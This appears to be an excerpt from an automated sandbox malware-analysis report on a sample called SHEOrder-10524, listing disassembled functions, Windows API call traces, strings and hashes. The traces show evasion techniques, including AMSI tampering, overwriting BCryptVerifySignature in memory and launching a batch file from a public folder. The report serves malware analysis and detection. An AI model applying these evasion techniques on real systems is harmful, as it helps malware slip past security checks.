• Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
Yara matches
Similarity
• API ID: AddressHandleMemoryModuleProcVirtual$AllocateContextCreateLibraryLoadProcessReadSectionThreadUnmapUserView
                                                                                                                                                                    • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$Initialize$NtOpenObjectAuditAlarm$NtReadVirtualMemory$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$bcrypt$ntdll$sppc$IC
                                                                                                                                                                    • API String ID: 3979268988-3678116285
                                                                                                                                                                    • Opcode ID: 33d580f981ab52f4ccb7f8ae410e7b113e13f2cba7c67fe7a55d3f91fa509e05
                                                                                                                                                                    • Instruction ID: 3a51e889f1e05188e5b8a44f4f66bf936115770ffc7b6f178406eace2d9c6496
                                                                                                                                                                    • Opcode Fuzzy Hash: 33d580f981ab52f4ccb7f8ae410e7b113e13f2cba7c67fe7a55d3f91fa509e05
                                                                                                                                                                    • Instruction Fuzzy Hash: 25E2FC3DA101789BDB51EBA8D890EDE73B6AF45701F2081A5E109E7314DB70EE89CF52
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 10506 28c5a90-28c5ad1 GetModuleFileNameA RegOpenKeyExA 10507 28c5b13-28c5b56 call 28c58cc RegQueryValueExA 10506->10507 10508 28c5ad3-28c5aef RegOpenKeyExA 10506->10508 10515 28c5b58-28c5b74 RegQueryValueExA 10507->10515 10516 28c5b7a-28c5b94 RegCloseKey 10507->10516 10508->10507 10509 28c5af1-28c5b0d RegOpenKeyExA 10508->10509 10509->10507 10511 28c5b9c-28c5bcd lstrcpynA GetThreadLocale GetLocaleInfoA 10509->10511 10513 28c5cb6-28c5cbd 10511->10513 10514 28c5bd3-28c5bd7 10511->10514 10517 28c5bd9-28c5bdd 10514->10517 10518 28c5be3-28c5bf9 lstrlenA 10514->10518 10515->10516 10519 28c5b76 10515->10519 10517->10513 10517->10518 10521 28c5bfc-28c5bff 10518->10521 10519->10516 10522 28c5c0b-28c5c13 10521->10522 10523 28c5c01-28c5c09 10521->10523 10522->10513 10525 28c5c19-28c5c1e 10522->10525 10523->10522 10524 28c5bfb 10523->10524 10524->10521 10526 28c5c48-28c5c4a 10525->10526 10527 28c5c20-28c5c46 lstrcpynA LoadLibraryExA 10525->10527 10526->10513 10528 28c5c4c-28c5c50 10526->10528 10527->10526 10528->10513 10529 28c5c52-28c5c82 lstrcpynA LoadLibraryExA 10528->10529 10529->10513 10530 28c5c84-28c5cb4 lstrcpynA LoadLibraryExA 10529->10530 10530->10513
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000105,028C0000,028EB790), ref: 028C5AAC
                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,028C0000,028EB790), ref: 028C5ACA
                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,028C0000,028EB790), ref: 028C5AE8
                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 028C5B06
                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,028C5B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 028C5B4F
                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,028C5CFC,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,028C5B95,?,80000001), ref: 028C5B6D
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,028C5B9C,00000000,?,?,00000000,028C5B95,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 028C5B8F
                                                                                                                                                                    • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 028C5BAC
                                                                                                                                                                    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 028C5BB9
                                                                                                                                                                    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 028C5BBF
                                                                                                                                                                    • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 028C5BEA
                                                                                                                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 028C5C31
                                                                                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 028C5C41
                                                                                                                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 028C5C69
                                                                                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 028C5C79
                                                                                                                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 028C5C9F
                                                                                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 028C5CAF
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                                                                    • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                                                    • API String ID: 1759228003-2375825460
                                                                                                                                                                    • Opcode ID: 19f5241adbda4ef8f05dca03e4c4cf80a99a8dc25dc34b47e7d4130f69b9e1ed
                                                                                                                                                                    • Instruction ID: ddf57ca36b92a0be5cad264e45448c0e31b924d19cf702577eb5b9c010c5989f
                                                                                                                                                                    • Opcode Fuzzy Hash: 19f5241adbda4ef8f05dca03e4c4cf80a99a8dc25dc34b47e7d4130f69b9e1ed
                                                                                                                                                                    • Instruction Fuzzy Hash: C1517D7DA4020C7DFF21D6A4CC85FEFBBAD9B04744FA001A9A608F6181D778EA448F65
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 12240 28dca6c-28dca70 12241 28dca75-28dca7a 12240->12241 12241->12241 12242 28dca7c-28dcf2f call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4704 * 2 call 28c4824 call 28c473c call 28c3098 call 28c4698 * 2 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4704 call 28c7ee8 call 28c4964 call 28c4d38 call 28c4db4 call 28c4704 call 28c4964 call 28c4d38 call 28c4db4 CreateProcessAsUserW call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 12241->12242 12403 28dd03a-28dd087 call 28c44c4 call 28c4c24 call 28c44c4 call 28c4c24 call 28c44c4 12242->12403 12404 28dcf35-28dd035 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 call 28c4824 call 28c4964 call 28c4698 call 28c47b0 call 28c4964 call 28c4698 call 28d7be8 WaitForSingleObject CloseHandle * 2 12242->12404 12404->12403
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 028D7BE8: LoadLibraryW.KERNEL32(?,00000000,028D7C9A), ref: 028D7C18
                                                                                                                                                                      • Part of subcall function 028D7BE8: GetModuleHandleW.KERNEL32(?,?,00000000,028D7C9A), ref: 028D7C1E
                                                                                                                                                                      • Part of subcall function 028D7BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 028D7C37
                                                                                                                                                                    • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000030,00000000,00000000,02924644,02924688,ScanString,02924344,028DD0A4,OpenSession,02924344), ref: 028DCDD3
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(0000086C,000000FF,ScanString,02924344,028DD0A4,OpenSession,02924344,028DD0A4,ScanString,02924344,028DD0A4,OpenSession,02924344,028DD0A4,UacScan,02924344), ref: 028DD01F
                                                                                                                                                                    • CloseHandle.KERNEL32(0000086C,0000086C,000000FF,ScanString,02924344,028DD0A4,OpenSession,02924344,028DD0A4,ScanString,02924344,028DD0A4,OpenSession,02924344,028DD0A4,UacScan), ref: 028DD02A
                                                                                                                                                                    • CloseHandle.KERNEL32(00000868,0000086C,0000086C,000000FF,ScanString,02924344,028DD0A4,OpenSession,02924344,028DD0A4,ScanString,02924344,028DD0A4,OpenSession,02924344,028DD0A4), ref: 028DD035
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Handle$Close$AddressCreateLibraryLoadModuleObjectProcProcessSingleUserWait
                                                                                                                                                                    • String ID: *"C:\Users\Public\Libraries\WagotghlO.bat" $Amsi$AmsiOpenSession$OpenSession$ScanString$UacScan
                                                                                                                                                                    • API String ID: 1205125484-1515945561
                                                                                                                                                                    • Opcode ID: 30d5de789b2610fdce9f6f12dd2300de84a250d599f692e0ddf515c6c7e4c223
                                                                                                                                                                    • Instruction ID: 429d0130ad13bf1a2522592fa9fb54d2b1ca369c1fb17a02956315f36ecf5ca7
                                                                                                                                                                    • Opcode Fuzzy Hash: 30d5de789b2610fdce9f6f12dd2300de84a250d599f692e0ddf515c6c7e4c223
                                                                                                                                                                    • Instruction Fuzzy Hash: C6F1E03DA001589FEB50FBA8D890FDE73BAAF85701F608065A105E7354DB74ED8A8F52
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 12444 28d7ac0-28d7adb LoadLibraryW 12445 28d7add-28d7ae6 GetProcAddress 12444->12445 12446 28d7b0a-28d7b12 12444->12446 12447 28d7ae8-28d7b00 NtWriteVirtualMemory 12445->12447 12448 28d7b04-28d7b05 FreeLibrary 12445->12448 12447->12448 12449 28d7b02 12447->12449 12448->12446 12449->12448
                                                                                                                                                                    APIs
                                                                                                                                                                    • LoadLibraryW.KERNEL32(bcrypt,028D9A30,Initialize,02924360,028D9A30,UacScan,02924360,028D9A30,UacInitialize,02924360,028D9A30,00000870,029243DC,ScanString,02924360,028D9A30), ref: 028D7AD2
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 028D7ADF
                                                                                                                                                                    • NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(0000088C,00000000,?,00000001,?,00000000,BCryptVerifySignature,bcrypt,028D9A30,Initialize,02924360,028D9A30,UacScan,02924360,028D9A30,UacInitialize), ref: 028D7AF6
                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,028D9A30,Initialize,02924360,028D9A30,UacScan,02924360,028D9A30,UacInitialize,02924360,028D9A30,00000870,029243DC), ref: 028D7B05
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                                                                                                    • String ID: BCryptVerifySignature$bcrypt
                                                                                                                                                                    • API String ID: 1002360270-4067648912
                                                                                                                                                                    • Opcode ID: ad32a12dd2a313207f2abf6604a44fcdea95e0bf229231ac431631d10f8221b9
                                                                                                                                                                    • Instruction ID: 48c1915e568266e88d7a46258be029e8c4ac435f1c88b459b4a9a4a701648486
                                                                                                                                                                    • Opcode Fuzzy Hash: ad32a12dd2a313207f2abf6604a44fcdea95e0bf229231ac431631d10f8221b9
                                                                                                                                                                    • Instruction Fuzzy Hash: 17F0E97E5053243ED12161285C40EBF635DCBC3761F10463DF558D6280E771C808C3B2
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

Control-flow Graph

APIs
• GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 028D7975
• GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 028D797B
• NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 028D799B
Strings
• NtAllocateVirtualMemory, xrefs: 028D796B
• C:\Windows\System32\ntdll.dll, xrefs: 028D7970
Memory Dump Source
• Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
• Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
Yara matches
Similarity
• API ID: AddressAllocateHandleMemoryModuleProcVirtual
• String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
• API String ID: 421316089-2206134580
• Opcode ID: e11e584079cd4ba0150c43c8ff8f5abc2b684fa7d38d6aa4f607e645690bf816
• Instruction ID: 1bb0f7c25f24a5dde320fee85e4cd113c3c7e5b750706ed0fcd2938dbfbcfb8f
• Opcode Fuzzy Hash: e11e584079cd4ba0150c43c8ff8f5abc2b684fa7d38d6aa4f607e645690bf816
• Instruction Fuzzy Hash: 09E01ABA64020CBFDB00EE98DD41EEA37ACAB08611F004415BA09D7201D734E9148BB5
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 028D7975
• GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 028D797B
• NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 028D799B
Strings
• NtAllocateVirtualMemory, xrefs: 028D796B
• C:\Windows\System32\ntdll.dll, xrefs: 028D7970
Memory Dump Source
• Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
• Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
Yara matches
Similarity
• API ID: AddressAllocateHandleMemoryModuleProcVirtual
• String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
• API String ID: 421316089-2206134580
• Opcode ID: 02bfd1e9bf0a1acc99d45c0b3e5052662ad5fcd59af9abaca165d4abaa22333a
• Instruction ID: ae2b0339f7f05ed92c063a806d34358de3a87543eedca69f232e03fe5ef1f5aa
• Opcode Fuzzy Hash: 02bfd1e9bf0a1acc99d45c0b3e5052662ad5fcd59af9abaca165d4abaa22333a
• Instruction Fuzzy Hash: 5BE01ABA54020CBFDB00EE98D941EDA37ACAB08611F004415BA09D7201D734E5148BB5
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
  • Part of subcall function 028C4EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 028C4EF2
• RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,028DC5AC), ref: 028DC517
• NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,028DC5AC), ref: 028DC547
• NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 028DC55C
• NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 028DC588
• NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 028DC591
  • Part of subcall function 028C4C24: SysFreeString.OLEAUT32(028DD42C), ref: 028C4C32
Memory Dump Source
• Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
• Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
Yara matches
Similarity
• API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
• String ID:
• API String ID: 1897104825-0
• Opcode ID: 99fdb64ddb09d938c9cea58e092c73d019e8dac4f91796c72478160b496739d0
• Instruction ID: adff1aed4e543ce93da3cee7cf3d8f91a2642de700f2f0539633e2eb57b1a209
• Opcode Fuzzy Hash: 99fdb64ddb09d938c9cea58e092c73d019e8dac4f91796c72478160b496739d0
• Instruction Fuzzy Hash: BD219279A502087AEB11EAD8CC52FDEB7BDAB08700F500466F600E71C0DAB4BA498B65
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 028DC9EA
Strings
Memory Dump Source
• Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
• Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
Yara matches
Similarity
• API ID: CheckConnectionInternet
• String ID: Initialize$OpenSession$ScanBuffer
• API String ID: 3847983778-3852638603
• Opcode ID: ce2aece50b9512c3f2e3623ea72fb177954d4072323a9a4d3da3d944b3028d78
• Instruction ID: 1a79a1c3ab432984f7c314abf170c7220a5e6926e4808c88dafbdeacdeeb6589
• Opcode Fuzzy Hash: ce2aece50b9512c3f2e3623ea72fb177954d4072323a9a4d3da3d944b3028d78
• Instruction Fuzzy Hash: A641087DA502589BEB10EAA8C850EDEB3BAEF48700F21442AE001E7254DB74E949CB52
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 028C4EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 028C4EF2
• RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,028DC4CA), ref: 028DC437
• NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 028DC471
• NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 028DC49E
• NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 028DC4A7
Memory Dump Source
• Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
• Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
Yara matches
Similarity
• API ID: FilePath$AllocCloseCreateNameName_StringWrite
• String ID:
• API String ID: 3764614163-0
• Opcode ID: 273fd0b716f58364e920db982dad8f92b4b770da0910eb73c6f80bc6aeccd7f2
• Instruction ID: 54cde8b09a3675f7ceca2fc7a6e44d751a037decc3d96cc75e18605adc8431c3
• Opcode Fuzzy Hash: 273fd0b716f58364e920db982dad8f92b4b770da0910eb73c6f80bc6aeccd7f2
• Instruction Fuzzy Hash: 7221E579A402087AEB10EA94CC52FDEB7BDEB04710F604466F604F71D0D7B4BE488A55
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 028C4EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 028C4EF2
• RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,028DC4CA), ref: 028DC437
• NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 028DC471
• NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 028DC49E
• NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 028DC4A7
Memory Dump Source
• Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
• Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
Yara matches
Similarity
• API ID: FilePath$AllocCloseCreateNameName_StringWrite
• String ID:
• API String ID: 3764614163-0
• Opcode ID: aaf869667c115ea3a2aff8a096a48d08efc765ef6eee678ed4eca607c8f8588b
• Instruction ID: a48210264787057712350812a663b3587d34beb6266228fa4d65ff7ac22e6123
• Opcode Fuzzy Hash: aaf869667c115ea3a2aff8a096a48d08efc765ef6eee678ed4eca607c8f8588b
• Instruction Fuzzy Hash: 0B21F179A40208BAEB10EBA4CC52FDEB7BDEB04B10F604466F604F71D0D7B4BE488A55
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 028C4EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 028C4EF2
• RtlInitUnicodeString.N(?,?,00000000,028DC3E2), ref: 028DC390
• RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,028DC3E2), ref: 028DC3A6
• NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,028DC3E2), ref: 028DC3C5
  • Part of subcall function 028C4C24: SysFreeString.OLEAUT32(028DD42C), ref: 028C4C32
Memory Dump Source
• Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
• Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
Yara matches
Similarity
                                                                                                                                                                    • API ID: String$Path$AllocDeleteFileFreeInitNameName_Unicode
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1694942484-0
                                                                                                                                                                    • Opcode ID: 95ffd6e46e08f7e426657ce4b1cb6ef0991998b3b126d763e019b37d6a174db6
                                                                                                                                                                    • Instruction ID: 611eea78dad611dcc0250f271b1a8eda7d48a117342fe2d17d78257d6f5d9659
                                                                                                                                                                    • Opcode Fuzzy Hash: 95ffd6e46e08f7e426657ce4b1cb6ef0991998b3b126d763e019b37d6a174db6
                                                                                                                                                                    • Instruction Fuzzy Hash: F301F87D944208BBDB15EBA4CD51FCDB3FDEB48700F614566E601E6180E774AB08CA65
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

APIs
  • Part of subcall function 028D6D28: CLSIDFromProgID.OLE32(00000000,?,00000000,028D6D75,?,?,?,00000000), ref: 028D6D55
• CoCreateInstance.OLE32(?,00000000,00000005,028D6E68,00000000,00000000,028D6DE7,?,00000000,028D6E57), ref: 028D6DD3
Memory Dump Source
• Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
• Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
Similarity
• API ID: CreateFromInstanceProg
• String ID:
• API String ID: 2151042543-0
• Opcode ID: 350d2021ca87de016ca95066f4c78071c2cc7d409d52c1f196a8a2fed119de86
• Instruction ID: 66c185ec2ebe637fb5a552d17b9969b88cea8cca3e902477659163e368e8b82e
• Opcode Fuzzy Hash: 350d2021ca87de016ca95066f4c78071c2cc7d409d52c1f196a8a2fed119de86
• Instruction Fuzzy Hash: 4001247C6087086EEB01DF75FC1286F7BACDB49B10FB10435F400E2640F638A904C961
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 028D7BE8: LoadLibraryW.KERNEL32(?,00000000,028D7C9A), ref: 028D7C18
  • Part of subcall function 028D7BE8: GetModuleHandleW.KERNEL32(?,?,00000000,028D7C9A), ref: 028D7C1E
  • Part of subcall function 028D7BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 028D7C37
  • Part of subcall function 028DC3F8: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,028DC4CA), ref: 028DC437
  • Part of subcall function 028DC3F8: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 028DC471
  • Part of subcall function 028DC3F8: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 028DC49E
  • Part of subcall function 028DC3F8: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 028DC4A7
  • Part of subcall function 028C7E18: GetFileAttributesA.KERNEL32(00000000,?,028DE0EE,ScanString,02924344,028E8FEC,OpenSession,02924344,028E8FEC,ScanString,02924344,028E8FEC,UacScan,02924344,028E8FEC,UacInitialize), ref: 028C7E23
